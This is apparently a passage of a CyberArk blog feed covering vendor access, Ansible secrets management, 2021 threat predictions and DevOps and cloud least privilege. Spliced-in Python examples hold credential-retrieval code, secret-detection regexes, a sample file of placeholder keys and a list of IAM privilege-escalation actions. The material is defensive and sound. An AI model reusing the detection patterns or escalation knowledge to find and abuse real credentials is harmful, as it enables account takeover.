According to a recent Ponemon report, the average hospital has relationships with more than 1,300 different external vendors. Each vendor identity requires different levels of privileged access to the healthcare organization’s data and systems to perform its role, from managing medical devices to keeping patient chart records up to date. Manually provisioning and managing privileged access for each of these identities is a major undertaking for IT and security staff. This may contribute to why only 36% of healthcare providers believe they can effectively prioritize external vendor risk, despite 80% believing it’s “very important” to do so.

A new study of more than 700 providers indicates healthcare-specific data breaches will triple in volume in 2021. To protect their organizations from unrelenting attacks – from the outside, inside, and across their third-party networks, healthcare IT security teams need the ability to scale their efforts and automate as many identity and privileged access management tasks as possible, like credential and session management, vendor identity authentication and just-in-time provisioning. Not only does this minimize time-consuming operational tasks, it makes it easier for verified vendors to access the systems, devices, and data they need to do their jobs, exactly when (and only when) they need to.

To learn more about our approach to managing identity-related risk across the healthcare continuum visit here, and check out CyberArk Remote Access, our SaaS solution that enables healthcare companies to automatically provision access to external third-party vendors that require privileged access to internal resources. Try a free 30-day trial of CyberArk Vendor Privileged Access Manager today!

Into The Matrix: Defense Contractor Takes the Red Pill to Accelerate Network Automation https://www.cyberark.com/blog/into-the-matrix-defense-contractor-takes-the-red-pill-to-accelerate-network-automation/ Mon, 07 Dec 2020 14:18:49 +0000 https://www.cyberark.com/?p=105765

Our modern world is built on vast interconnected systems of network devices. Within an organization, networks keep everyone and everything connected and up and running. To maintain a strong cybersecurity posture, network infrastructure must reflect the well-known CIA “triad” of confidentiality, integrity and availability. Each configuration within the network comprises multiple pieces of equipment, each secured by credentials and secrets, and must remain confidential, with access granted only to authorized personnel. To maintain integrity, each configuration must also be consistent and compliant with various frameworks and standards. And to meet availability standards, each device must be continuously updated to keep things running smoothly and securely.

Maintaining this security triad is paramount for government agencies and their partners as they hold both sensitive data and the keys to critical infrastructure. Yet their IT security teams face challenges in scaling security across these increasingly complex, interconnected global networks. Manually managing tens of thousands of networking devices often requires several full-time staff members and hundreds (perhaps thousands) of hours spent backing up the system and maintaining configuration standards alone. As IT shops work hard to do more with less, while facing pressure to speed processes and maximize efficiency, automation is now the name of the game and a strategic component of digital transformation. While the notion of automating a huge network may seem intimidating at first, it doesn’t have to be that way.

This is a story of how a leading defense contractor took a lean, mean, automated approach to managing their machines — by diving head-first into The Matrix.

Into The Matrix: Automation Unlocks a New Dimension

In the pop-culture classic film “The Matrix,” starring Keanu Reeves, the character Neo was presented with a tough choice: keep your old life and maintain status quo by choosing to take a blue pill or discover a whole new world and limitless possibilities by taking the red pill.

Once Neo chooses to take the red pill, the world of The Matrix opens up to him. Not only does he learn that everything about life as he knew it was a lie, but he also learns how to manipulate the world around him to make things easier and more efficient. For example, he is able to bypass decades of martial arts training just by “plugging in,” mastering kung fu in a matter of seconds. This “automatically” acquired skill becomes valuable later on in the movie when he faces the antagonist Agent Smith in the final life-or-death showdown.

Sure, this comparison isn’t perfect – after all, we’re talking about automating systems and machines, not learning kung fu. But when presented with the option of putting thousands of hours into manual configuration or automating the network, the choice is clear: automation can make all the difference when facing metaphorical “Agent Smiths,” from rogue attackers to relentless nation-states.

How a Defense Contractor Mastered the Matrix with the CyberArk Ansible Tower Integration

For this government defense contractor, automation was crucial to conquering the gargantuan task of securely configuring and maintaining thousands of routers, switches, and other networking devices across its network. For this organization, Red Hat’s Ansible Platform was a natural choice, providing a simple, device-agnostic way to automatically configure their network stack, simplify authentication processes, and continuously test and correct network configuration issues.

But to make this automation “magic” happen across so many different functions and systems, tools like Red Hat Ansible require highly privileged access in the form of identities, credentials, and secrets. This far-reaching access makes these tools very powerful – and also very attractive targets for cyber attackers, who, just like many organizations today, are focused on working smarter not harder. If they can gain access to privileged credentials that open direct doors to sensitive assets and data, they can save a lot of time and effort.

Understanding these risks, the defense contractor brought together a powerful trio of Red Hat Ansible Tower, CyberArk Secrets Management, and Cisco Identity Services Engine (ISE) to protect and programmatically rotate privileged credentials and secrets, meet compliance requirements, accelerate its strategic automation push, and ultimately, tame the Matrix.

Here’s how it works.

  • Using secrets and privileged credentials, Ansible Tower accesses and interacts with Cisco ISE to log on to each networking device and perform automated duties, such as backup configuration, network configuration maintenance, and more.
  • Instead of storing these secrets in Ansible Tower itself, which would add another attack vector and another credential store to maintain, the CyberArk Ansible Tower integration directs all credential requests to CyberArk Secrets Management.
  • All Cisco ISE secrets and credentials are centrally stored, monitored, rotated daily (based on the contractor’s specific policies and requirements), and audited by the CyberArk Privileged Access Manager solution. When a credential is needed, Ansible Tower retrieves it via a query, enabling secure access to Cisco ISE.
  • Ansible playbooks can rapidly and seamlessly access and use the credential, brokering access and enabling the automated process.
  • And to make it even easier, integrations between Ansible and CyberArk, and with Cisco and CyberArk, are available in the CyberArk Marketplace.
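The retrieval step in the list above, as an added example in Python rather than the Ansible Tower credential lookup the contractor used (this is not code from the original post or from CyberArk): it performs the same kind of query the Tower integration makes, an HTTP GET against the Central Credential Provider's REST endpoint naming the calling application, the safe and the account, so the device password never lives in a playbook or in Tower. The CCP path is the documented one; the host, application ID, safe and account names are assumptions, and the `constructed_ccp` opener stands in for a real CCP so the block runs offline. A real deployment also presents a client certificate (CCP authorizes the calling application, not a person) and verifies the server's.

```python
import json
import urllib.parse
import urllib.request

# CCP's REST path (documented by CyberArk); host, AppID, safe and object are assumptions.
CCP_PATH = "/AIMWebService/api/Accounts"


def build_ccp_url(base_url, app_id, safe, object_name):
    """Build the GET URL that asks CCP for one account by safe and object name."""
    query = urllib.parse.urlencode({"AppID": app_id, "Safe": safe, "Object": object_name})
    return base_url.rstrip("/") + CCP_PATH + "?" + query


def fetch_credential(base_url, app_id, safe, object_name, opener=urllib.request.urlopen):
    """Retrieve a credential at run time instead of embedding it.

    `opener` defaults to urllib's urlopen; a real client would also supply a client
    certificate and verify the server certificate. The returned dict is the only
    place the password lives, so callers must not log it or write it to disk.
    """
    url = build_ccp_url(base_url, app_id, safe, object_name)
    with opener(url, timeout=10) as resp:
        body = json.load(resp)
    missing = [k for k in ("Content", "UserName") if k not in body]
    if missing:
        raise RuntimeError(f"CCP response lacks {missing}; refusing to guess")
    return {
        "username": body["UserName"],
        "password": body["Content"],   # CCP returns the secret in the Content field
        "address": body.get("Address", ""),
    }


class _ConstructedResponse:
    """Minimal stand-in for the object urlopen returns (read + context manager)."""

    def __init__(self, payload):
        self._raw = json.dumps(payload).encode()

    def read(self):
        return self._raw

    def __enter__(self):
        return self

    def __exit__(self, *exc):
        return False


def constructed_ccp(url, timeout=10):
    """Offline stand-in for CCP: authorizes by AppID and safe, returns a constructed account."""
    parsed = urllib.parse.urlparse(url)
    params = dict(urllib.parse.parse_qsl(parsed.query))
    if parsed.path != CCP_PATH:
        raise ValueError(f"constructed CCP: unexpected path {parsed.path}")
    # CCP only answers applications that policy has authorized for that safe.
    if params.get("AppID") != "AnsibleTower" or params.get("Safe") != "NetworkDevices":
        raise PermissionError("constructed CCP: application not authorized for this safe")
    return _ConstructedResponse({
        "Content": "s3cr3t-rotated-daily",   # constructed password, rotated by PAM, never in a playbook
        "UserName": "ise-admin",
        "Address": "ise.example.internal",
        "PolicyID": "CiscoISE",
    })


if __name__ == "__main__":
    cred = fetch_credential("https://ccp.example.internal", "AnsibleTower",
                            "NetworkDevices", "ise-admin", opener=constructed_ccp)
    print("retrieved account", cred["username"], "for", cred["address"])   # no password in output
```

Because authorization is keyed on the application identity plus safe, a playbook copied to an unauthorized host or run under a different AppID gets nothing, and rotating the password in the vault changes nothing on the automation side: the next query simply returns the new value.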

With this integrated and centralized secrets management approach, the organization can stay in compliance, easily audit all access throughout various Ansible nodes and rapidly rotate device passwords based on policy or an incident – all without changing workflows, breaking automation, or adding operational complexity or overhead.

Today, the defense organization can automatically patch, reconfigure and update more than 80,000 networking devices in less than two hours. By eliminating these manual processes, the IT security and network operations teams have saved hundreds of thousands of work hours and can now dedicate significantly more time to business-critical tasks that move the organization forward.

Working together, CyberArk, Ansible Tower, and Cisco ISE have automated the network – and this defense contractor client has tamed its own Matrix, much like Neo did.

To hear the full story, tune in to our recent AnsibleFest 2020 talk (free registration required). To learn how CyberArk combined with Red Hat can help your organization securely automate processes and unleash operational efficiencies, check out these resources:

]]>
2021 Cybersecurity Trends: The Emergence of the Personalized Attack Chain https://www.cyberark.com/blog/2021-cybersecurity-trends-the-emergence-of-the-personalized-attack-chain/ Tue, 01 Dec 2020 12:51:08 +0000 https://www.cyberark.com/?p=105413 Cybersecurity Trends 2021

It’s hard to look forward to 2021 without considering the cybersecurity trends that shaped the generally unloved year known as #2020. History books will, of course, remember this year mostly for two major events – the COVID-19 pandemic and the US presidential election. From a business perspective, the pandemic has altered nearly every aspect of how organizations operate. From the rapid shift to remote work to completely rethinking every aspect of the customer dynamic, the business world has been turned on its head.

These changes have also caused a dramatic acceleration in digital initiatives across industries. Many drove what felt like 5 years of transformation in 5 months – as they quickly adopted technologies to help productivity and business continuity. Whether it was bringing on new collaboration tools or moving critical infrastructure and applications to the cloud, everything has become more distributed – and as a result, has significantly increased opportunities for attackers.

As we look ahead to 2021, how will the convergence of these unimaginable forces and events impact cybersecurity for the next 12 months?

I checked in with some of our in-house experts and here’s what they had to say:

Personal Islands of Security Shift the Attacker’s Mindset

As more and more companies look at remote work strategies for the long term, distributed IT environments are only going to continue to expand. With many employees working from home, they are regularly accessing corporate systems and resources through insecure home networks and personal devices – making each and every user their own island where legacy security controls are ineffective. Individual actions are threatening corporate security to a greater degree than ever before.

It’s because of these islands of security that we’ll see the attack cycle move away from broad “spray and pray” social-engineering attacks to more hyper-personalized attacks targeting those users with privileged access to sensitive systems, data, and infrastructure.

Where attackers generally rely on lateral movement – seeking any foothold and working to elevate access and move across the network to get to their desired destination – these islands now limit the attacker to whatever high levels of access their specific target has been granted. As a result, we’ll see a move toward vertical movement – with attackers targeting individuals, like business users, based on what they have access to – from administrative consoles and financial records to competitive data.

While this new “personalized attack chain” approach will be more time consuming and costly for attackers as they look to identify and profile the exact person they are looking for, it will also lead to shorter attack cycles – making it more difficult for organizations to identify and stop attacks before they impact the business.

-Shay Nahari, Head of Red Team Services

Deepfakes Appear in Enterprise Attacks

Can something be overhyped and an emerging threat? This is where we are with deepfakes – a term that is simultaneously overused and an example of how attackers will continue to personalize their attacks.

In simple terms, deepfakes are synthetic or manipulated media in which a person in a video or image is replaced with someone else’s likeness. From a cultural standpoint, the concept of deepfakes has dominated news cycles as a potential threat that could influence public opinion, damage reputation, and more. Often, these attacks make headlines but end up relatively empty when it comes to effectiveness.

However, as the personal attack chain trend evolves, we’ll see the emergence of deepfakes used more in enterprise attacks – not to sow mass confusion or chaos necessarily, but more to amplify social engineering attacks.

For example, video and recordings of executives and business leaders are readily available across marketing collateral, social media channels, and more. Attackers could coordinate deepfakes from these properties as a strategic follow-on to phishing attempts (which will also move away from email to other platforms like chat and collaboration apps) to make manipulated communications feel even more authentic. Especially in today’s day and age where more and more organizations are relying on video as a way for executives to communicate with their remote employees, attackers can take advantage of this instilled level of trust.

For example, phishing emails spoofing IT asking for passwords are common – but what if that email was followed by an urgent message from the CEO on WhatsApp? Attackers could also use manipulated videos of executive leaders on social channels to entice customers, employees, partners, and others to click on malicious links – creating broader new attack avenues for malicious actors.

-Nir Chako, Cyber Research Team Leader, CyberArk Labs

5G Leads to Biggest DDoS Attack Yet

We’ve already started to see how the adoption of technologies like 5G, IoT and cloud are driving new frontiers for business – and this will continue in 2021. For 5G in particular, while it allows businesses to speed up digital transformation and create dynamic customer experiences, it is also expanding the attack surface exponentially as more and more interconnected devices come online – and opening organizations up to new risks.

Google recently revealed that it was hit with a massive 2.5 Tbps DDoS attack in 2017 – the largest such attack ever recorded – even topping the 2.3 Tbps attack that targeted Amazon in 2018. Comparatively, these attacks were 4x the scale of the massive Mirai botnet attacks of 2016 that compromised more than 600,000 IoT devices and endpoints.

As 5G is rolled out across the globe, these attacks will pale in comparison to the massive, and more frequent, DDoS attacks 5G will enable. 5G will increase the overall bandwidth available and allow a massive amount of IoT devices to be connected. Because there is still no standard for IoT security, these devices are often easy to compromise and control as part of amassing a botnet army.

As a result, we’ll see the first-ever 5Tbps DDoS attack being launched within the next year. The 2Tbps attacks thwarted by Google and Amazon will become more commonplace – causing massive disruption of online and connected businesses.

-Bryan Murphy, Director of Consulting Services

Pandemic-Led Pressure Cracks Insiders and Drives Bad Decisions

The pandemic has created tremendous pressure on employees and their families. Economic uncertainty and the move to remote work and school have put many in uncharted territory. These new challenges could likely drive more employees to make poor decisions when it comes to cybersecurity and create a whole new wave of insiders.

As we’ve already seen in 2020, attackers are increasingly offering employees with privileged access tempting financial incentives to share or ‘accidentally’ leak their credentials. In addition, privileged access on the dark web is more popular than ever, with some reports indicating that attackers will pay a premium for privileged access to corporate networks, VPNs and workstations.

The potential financial payoff, combined with increased economic anxiety, will drive new threats that organizations will struggle to deal with.

-David Higgins, Technical Director

]]>
When Every Day is Cyber Monday, Attackers Can Score Big https://www.cyberark.com/blog/when-every-day-is-cyber-monday-attackers-can-score-big/ Tue, 24 Nov 2020 04:15:12 +0000 https://www.cyberark.com/?p=105231 Cyber Monday Everyday

Back in the seemingly footloose and fancy-free pre-Covid-19 age, shopping holidays were also rooted in pre-New Normal reality. But since last spring, our offline and online lives have further blurred, and merchant focus on one-off shopping holidays has shifted to meet the always-on, always-home behaviors and preferences of consumers in physical limbo.

Unsurprisingly, nearly 70% of consumers say they’ve increased online shopping in the last six months. Now that we’re fully stocked with paper towels, many people are ready to pounce on “essential” holiday must-haves like the new Sony PS5 – and we’re not waiting until Cyber Monday, which is starting to feel like a quaint relic of yesteryear.

This surge in eCommerce activity has opened floodgates of opportunity for cyber attackers looking to cash in on rapid change. With the holidays just around the corner, how will our “new normal” impact seasonal shopping habits, and what does it mean for cybersecurity? What risks are consumers willing to take to get that gift?

Black Friday and Cyber Monday Holiday Shopping Survey


The Disappearance of Black Friday and Cyber Monday

Over the last six to eight months, retailers have been eager to court customers who have cautiously curtailed spending during this time of uncertainty by offering deep discounts and adapting to changing shopper behaviors.

Instead of waiting for Black Friday and Cyber Monday, many began dropping deals during the fall. Amazon, Best Buy, Macy’s, and Target were among many retailers to release their biggest Black Friday discounts in October – nearly two full months before the official start of the holiday shopping season.

Consumers are gladly taking advantage of these early digital deals, jumpstarting their holiday shopping while skipping the crowds and irritating mall music. In fact, according to The CyberArk Holiday Shopping Security Survey, more than half of respondents (53%) say they won’t participate in the traditional shopping “holidays” like Black Friday or Cyber Monday this year. Either they believe good discounts are always available in this day and age, or they’ve started their shopping extremely early because of expected shipping delays. Either way, the holiday shopping season – at least in 2020 – will not be limited to a few marathon days.

With shoppers spending more time online and spreading out their spending over months, what should we know about rising attacker opportunities?

Cyber Attackers and the New Retail Reality

The spike in online shopping and digital advertising is also creating more opportunities for attackers – who are looking to take advantage of unsuspecting consumers – many of whom admit to risky shopping habits.

For example, 65% of consumers admit to saving passwords and credit cards on their devices. Sure, it’s convenient to make a quick purchase, but there’s a major downside. Credit card numbers saved in a browser can be enticing targets for phishing attacks.

Further, anyone who has waited weeks (or months!) for toilet paper to get delivered from Amazon or your favorite big-box retailer knows that many manufacturers are having a tough time keeping up with demand. Anticipating supply chain issues this season, 57% of consumers say they would be willing to shop at unfamiliar online stores in order to score the perfect holiday gift on time. Okay. Your kid really needs a Star Wars Mandalorian Darksaber — and you’re running out of time. So you search around, finally find one from a retailer you’ve never heard of – but they have it in stock. You punch in your credit card number with glee. Yet fraudsters set up fake typosquat websites to trick online shoppers into disclosing sensitive information all the time. Before making a purchase, it’s important to do some research on the retailer. Are they reputable? Do they have “https” and the closed padlock icon in the browser? Keep in mind what that padlock does and doesn’t tell you: it means the connection is encrypted, not that the merchant is legitimate, and fraudulent sites obtain certificates just as easily as real ones. Its absence is a clear warning sign; its presence is only the starting point.

It’s not that consumers don’t recognize the risks of online shopping. Only 26% are totally confident in retailers’ ability to secure their transactions and privacy – but consumer awareness hasn’t translated to action. And today, convenience often trumps caution.

The year 2020 has “gifted” us all with a host of unanticipated scenarios and challenges, some of which threaten online security and privacy. Don’t let holiday shopping be one of them.

Employers, Beware: Employee Shopping Habits Have a Dangerous Ripple Effect

Unfortunately, risky consumer shopping habits put more than personal devices and information in danger. Thirty percent of respondents admit to using their corporate devices to shop online, while 27% allow household members to use their corporate devices to shop online. These behaviors threaten corporate security. All it takes is one compromised credential on one employee laptop to potentially cause costly business damage and disruption.

While “Christmas Every Day” makes for great Hallmark Channel movie material, an extended holiday season isn’t all holly and jolly. Nearly three months of digital deals mean cyber attackers have significantly more time to spoof employees with holiday-themed phishing emails, websites, social media scams, and more. Stay vigilant, and as you look to the year ahead, make sure organizational cybersecurity strategies align with new realities and consumer behaviors. Because as it turns out, shopping for everything from groceries to cars is pretty convenient and comfortable from the couch – and it’s not going away anytime soon.

The CyberArk Holiday Shopping Security Survey, 2020 was conducted in October 2020 by an independent research agency. The study included responses from 2,000 consumers in the United States, UK, France, and Germany.

]]>
CyberArk Named a Privileged Identity Management Leader https://www.cyberark.com/blog/cyberark-named-a-privileged-identity-management-leader/ Wed, 18 Nov 2020 15:12:03 +0000 https://www.cyberark.com/?p=104795 Privileged Identity Management Leader

There’s never been a better time to be a cyber attacker. The mobile, cloud, and digital world is opening new doors and pathways to organizations’ most valuable assets. Stopping every attack is now out of the question.

At CyberArk, we believe proactive protection must center on securing and managing access for the thousands of human, application, and machine identities that exist in modern IT environments — any of which can become privileged at any moment, depending on what they’re accessing or doing. According to Forrester*, “machine identities are growing at twice the rate of human identities.” Layer on top of that expanding use cases for cloud, DevOps, and IoT – and the opportunities for attacker compromise are plentiful.

Today, independent research firm Forrester Research released The Forrester Wave™: Privileged Identity Management, Q4 2020.* For the report, Forrester evaluated the 10 most significant privileged identity management (PIM) vendors and identified CyberArk as a Leader.

CyberArk received the highest score in the “Current Offering” category and received the highest possible scores in 16 criteria, including threat monitoring and security, SaaS/cloud, remote access and support, execution roadmap, and innovation roadmap, among others.

This is the third in a series of recognitions as a leader this year by top global analyst firms that, in our opinion, reflect CyberArk’s solid strategy execution, unwavering commitment to innovation, and strong customer satisfaction.

In a year fraught with uncertainty, we’ve remained focused on delivering proven solutions and services that reduce risk and simplify operations so customers can securely implement digital transformation initiatives, including accelerating cloud migration, to drive their business forward and support a growing legion of remote workers.

Earlier this year, we unveiled our Identity Security vision that starts with Zero Trust and uses artificial intelligence to understand context and intent, and took the first step in delivering on this strategy. According to the Forrester report, “CyberArk’s $70 million acquisition of IDaaS provider Idaptive in May 2020 signals a major move to expand beyond its core competency and provide secure access for the entire workforce.”

We’ve continued that momentum throughout the year and are constantly innovating to raise the bar to deliver unparalleled security for our customers. Just last week we introduced CyberArk Cloud Entitlements Manager, a privilege-based, AI-powered service that removes excessive permissions to strengthen the security of cloud environments. Part of our expanding SaaS portfolio, this latest innovation further solidifies CyberArk’s market leadership position while making it easier and faster for organizations to improve their security posture by aligning with least privilege principles.

This “make it simple” mantra extends to our evolving strategy to make it even easier for customers to purchase, deploy and scale our solutions – including a broad range of just-in-time capabilities for improved privileged access control and an expanding subscription model.

We’ve also rolled out new services to help organizations develop and mature their privileged access and identity management programs. Drawing on our experience with more than 6,300 customers, the CyberArk Blueprint offers prescriptive guidance for securing privileged access everywhere: in the cloud, on employee endpoints, in SaaS applications, within automated workflows, throughout DevOps pipelines, and more.

According to the report, “CyberArk boasts industry-leading security capabilities across the portfolio, along with very good threat monitoring. The performance, scalability, and resilience of the offerings have been proved out by many large customers.”

We take great pride in this milestone, which we share with each of our customers, partners, and employees. Thank you for inspiring and driving us to continuously reimagine what’s possible.

To learn more, download a complimentary copy of The Forrester Wave™: Privileged Identity Management, Q4 2020 Report. Stay tuned for another great year of industry-leading innovation in 2021.

1 – The Forrester Wave™: Privileged Identity Management, Q4 2020 by Sean Ryan and Elsa Pikulik with Merritt Maxim, Benjamin Corey, and Peggy Dostie, November 18, 2020


]]>
Secure Your Cloud Native Applications and DevOps Pipeline in Six Steps https://www.cyberark.com/blog/secure-your-cloud-native-applications-and-devops-pipeline-in-six-steps/ Tue, 17 Nov 2020 16:06:00 +0000 https://www.cyberark.com/?p=104784 DevOps Pipeline and Cloud-Native Application Security

Editor’s Note: This is part three of a blog series on securing privileged access and identities in the cloud.

DevOps is transforming how organizations across industries from banking to eCommerce to healthcare build and deliver cloud-native applications. With DevOps, new application functionality can be delivered in rapid iterations and at scale, driving agile innovation to meet increasing customer demands and build competitive advantage.

A recent Harvard Business Review Analytic Services study found that roughly two-thirds of respondents use DevOps, and see benefits that impact their bottom line, including increased speed to market (identified by 70% of respondents), productivity (67%), customer relevance (67%), innovation (66%), and product/service quality (64%).

Using continuous integration (CI), developers merge code changes into a shared repository multiple times a day, and each merge is automatically built and tested. Through continuous delivery (CD), code is kept in a deployable state so it’s ready for release into production at the touch of a button.

As custom-built cloud applications are built and delivered using these agile DevOps practices, they rely on API access keys for dynamic connection to other applications and resources. Sometimes referred to as “API keys,” these powerful credentials are used to authenticate applications and DevOps automation tools and enable programmatic requests to the cloud environment. API keys can be used for virtually anything, from provisioning a container to copying a database to allowing one service to access data from another. Attackers have used API access keys — stolen from phished endpoints or inadvertently posted to public code repositories and other sources — to steal customer data and valuable intellectual property or destructively delete source code.

Many of the DevOps tools used to orchestrate the development and delivery of custom-built cloud applications are themselves highly privileged: configuration management tools such as Ansible, for example, and the tools used to run automated tests and builds, like Jenkins. Since these “tier 0” tools have full control of the environment, administrative access to them must be tightly controlled and restricted to reduce exposure.

Here are six steps for securing privileged access to custom-built cloud applications and in the DevOps pipeline where they’re created and deployed:

1. Remove all embedded API keys and secrets from source code, scripts, and automation tools. DevOps culture emphasizes collaboration and code sharing, and it’s common practice to post application code to GitHub and other public repositories. Too often, that code contains embedded API keys and other credentials and secrets, and attackers trawl these repositories to locate and abuse them. Stay a step ahead by removing hard-coded credentials completely. Similarly, never give human users direct access to API keys.

2. Proactively secure all API keys and secrets in a secure digital vault that supports strong privileged access controls. Only allow access to authorized, verified users and applications under centralized, corporate-wide access policies.

3. Enforce least privilege access controls for all DevOps tools, including admin consoles as well as highly privileged human users. Follow strong privileged access management best practices, such as rotating privileged credentials and monitoring and recording privileged access activity for human and automated users.

4. Apply consistent, enterprise-wide security policies to the tools and admin consoles used at each specific stage of the DevOps pipeline: plan, code, build, test, release, deploy, operate, monitor.

5. Leverage single sign-on (SSO) and multi-factor authentication (MFA) to solve pervasive password challenges and strengthen Identity Security when granting DevOps access to any highly privileged human user.

6. Perform regular audits to identify gaps and privilege-related risk and to continuously improve overall security posture.
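Step 1 above, as an added example that is not part of the original post: a small scanner of the kind attackers run against public repositories and the kind you should run in CI before code is pushed. It looks for a few well-known key formats (AWS access key IDs, GitHub tokens, PEM private-key headers) and, as a catch-all, for long high-entropy quoted strings assigned to variables named like secrets, while skipping short placeholders and values read from the environment. The sample file is constructed (the AWS pair in it is the placeholder pair from AWS’s own documentation, the GitHub token is made up in the `ghp_` format); the set of formats and the entropy threshold are assumptions you would tune for your own providers.

```python
import math
import re
from collections import Counter

# Well-known credential formats (assumed set; extend with your providers' formats).
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}

# Generic catch-all: a secret-looking variable assigned a quoted literal of 12+ characters.
ASSIGNMENT = re.compile(
    r"\b(\w*(?:api[_-]?key|secret|token|password|passwd|pwd)\w*)\s*[:=]\s*['\"]([^'\"\s]{12,})['\"]",
    re.IGNORECASE,
)


def shannon_entropy(value):
    """Bits per character; generated keys sit well above human-chosen placeholders."""
    counts = Counter(value)
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan(text, entropy_threshold=3.5):
    """Return (line_number, kind, value) for each embedded credential found in `text`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        seen = set()
        for kind, pattern in PATTERNS.items():
            for match in pattern.finditer(line):
                findings.append((lineno, kind, match.group(0)))
                seen.add(match.group(0))
        for match in ASSIGNMENT.finditer(line):
            value = match.group(2)
            # Skip values a specific pattern already reported and low-entropy placeholders.
            if value in seen or shannon_entropy(value) < entropy_threshold:
                continue
            findings.append((lineno, "high_entropy_assignment", value))
    return findings


# Constructed sample file. The AWS pair is the placeholder pair from AWS's documentation;
# the GitHub token is a made-up string in the ghp_ format.
SAMPLE = """\
import os
# settings for the deploy job
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
GITHUB_TOKEN = "ghp_0123456789abcdefghijklmnopqrstuvwxyz"
api_key = "REPLACE_ME_PLEASE"
DB_PASSWORD = os.environ["DB_PASSWORD"]
-----BEGIN RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for lineno, kind, value in scan(SAMPLE):
        print(f"line {lineno}: {kind}: {value[:8]}...")   # never echo the whole secret
```

The secret access key on line 4 is caught only by the entropy rule, which is why a format list alone is not enough; the `REPLACE_ME_PLEASE` placeholder and the `os.environ` lookup are left alone, which is the behaviour you want once hard-coded values have been moved to a vault and injected at run time.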

Consistency Is Key

The most effective cybersecurity programs enforce identity and privileged access policies consistently across their entire organization — regardless of infrastructure, application mix, or development philosophy. This must be done at scale to keep pace as the organization and its cloud workloads evolve to support digital transformation and flexible work models. This can only be achieved from a centralized point of control that enables consistent management of privileged credentials, human and non-human identities, devices, and secrets across multi-cloud and hybrid environments.

Learn more in our eBook, “Securing Privileged Access and Identities In 5 Key Cloud Scenarios” and our cloud security resources. The next post in our series will tackle SaaS application security, a top-of-mind concern for nearly every digital business today.

]]>
A Zero Trust Approach to Protecting Cloud Identities Begins with Least Privilege https://www.cyberark.com/blog/a-zero-trust-approach-to-protecting-cloud-identities-begins-with-least-privilege/ Mon, 09 Nov 2020 12:46:22 +0000 https://www.cyberark.com/?p=104620 Zero Trust Starts with Least Privilege

The world is changing quickly. Digital transformation initiatives and new services from cloud providers are creating an explosion of identity-based permissions. Through the eyes of an attacker, each cloud identity represents a potential opportunity and first step toward a company’s most valuable assets.

Today we are proud to unveil CyberArk Cloud Entitlements Manager, an artificial intelligence-powered cloud security service that centralizes visibility and control across cloud environments, helping organizations strategically remove excessive permissions that pose a security risk.

CyberArk Cloud Entitlements Manager is a key component of our Identity Security strategy, which reflects that any identity can become privileged in modern IT environments. Cloud Entitlements Manager takes a Zero Trust approach to reducing risk and improving visibility across cloud environments – built on the principle of least privilege.


Least Privilege Access: A Core Tenet of Zero Trust

Adoption of public cloud services, SaaS applications, and remote access have dissolved the traditional network perimeter. This establishes identity as the key line of defense for most organizations and the de facto ‘new perimeter.’ As modern Zero Trust models take hold, authentication and authorization of all identities become paramount. In cloud environments, any human or machine identity can be configured with thousands of identity and access management (IAM) permissions to access cloud services containing sensitive information. User, group and role identities are assigned permissions depending on their job functions. Many organizations unintentionally configure their various identities with permissions to access cloud services they don’t actually use or need.

These excessive permissions pose a major challenge for organizations as they move toward Zero Trust security frameworks, which demand that every identity attempting to access corporate resources be verified and their access intelligently limited. A recent ESG survey, sponsored by CyberArk and other technology vendors, found over-permissioned accounts and roles as the top-ranked cloud service misconfiguration. Not surprisingly, attackers have taken notice: the same survey ranked overly permissive privileges as the most common attack vector against cloud applications*.

By compromising a cloud identity with overly broad permissions, an attacker can access critical workloads undetected or escalate their privileges to steal cloud-hosted data, disrupt high-value applications or even take entire cloud deployments offline.

To address this challenge, implementing least privilege, in which all identities have only the minimum necessary entitlements to perform their ongoing responsibilities, is an established best practice for organizations on their Zero Trust and cloud journeys. Establishing least privilege also limits the number of entities that can grant or configure new permissions, making it difficult for attackers to escalate privileges and reach their goals.
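The entitlements audit the paragraphs above call for, as an added example that is not part of the original post or of CyberArk’s product: given an identity’s policy and the actions it actually exercised over an observation window, it expands wildcards, lists the unused grants, singles out the unused ones that could be used to create or attach new permissions (the escalation path mentioned above), and emits a policy trimmed to the intersection. The action catalogue, the policy, the usage set and the escalation-sensitive list are all constructed; a real tool would expand wildcards against the provider’s full action list and take usage from CloudTrail or its equivalent.

```python
import fnmatch
import json

# Constructed, deliberately small catalogue of actions used to expand wildcards;
# a real audit tool loads the cloud provider's full action list per service.
ACTION_CATALOGUE = [
    "s3:GetObject", "s3:PutObject", "s3:DeleteObject", "s3:ListBucket", "s3:DeleteBucket",
    "iam:CreateUser", "iam:AttachUserPolicy", "iam:PassRole", "iam:ListUsers",
    "ec2:DescribeInstances", "ec2:RunInstances", "ec2:TerminateInstances",
]

# Actions that let an identity grant or configure permissions for others (assumed list).
ESCALATION_SENSITIVE = {"iam:CreateUser", "iam:AttachUserPolicy", "iam:PassRole"}

# Constructed over-permissioned policy of the kind the post describes: wildcards added
# to avoid developer friction, plus a PassRole grant nobody removed.
OVER_PERMISSIVE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:*", "ec2:Describe*"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:PassRole", "Resource": "*"},
    ],
}

# Constructed 90-day usage, the kind of thing CloudTrail would show for this identity.
OBSERVED_ACTIONS = {"s3:GetObject", "s3:PutObject", "ec2:DescribeInstances"}


def expand(pattern):
    """Expand an action pattern ('s3:*', 'ec2:Describe*') against the catalogue.

    IAM matches action names case-insensitively, so compare in lower case.
    """
    return sorted(a for a in ACTION_CATALOGUE
                  if fnmatch.fnmatchcase(a.lower(), pattern.lower()))


def granted_actions(policy):
    """Every concrete action an Allow statement grants, wildcards expanded."""
    granted = set()
    for stmt in policy["Statement"]:
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        if isinstance(actions, str):
            actions = [actions]
        for pattern in actions:
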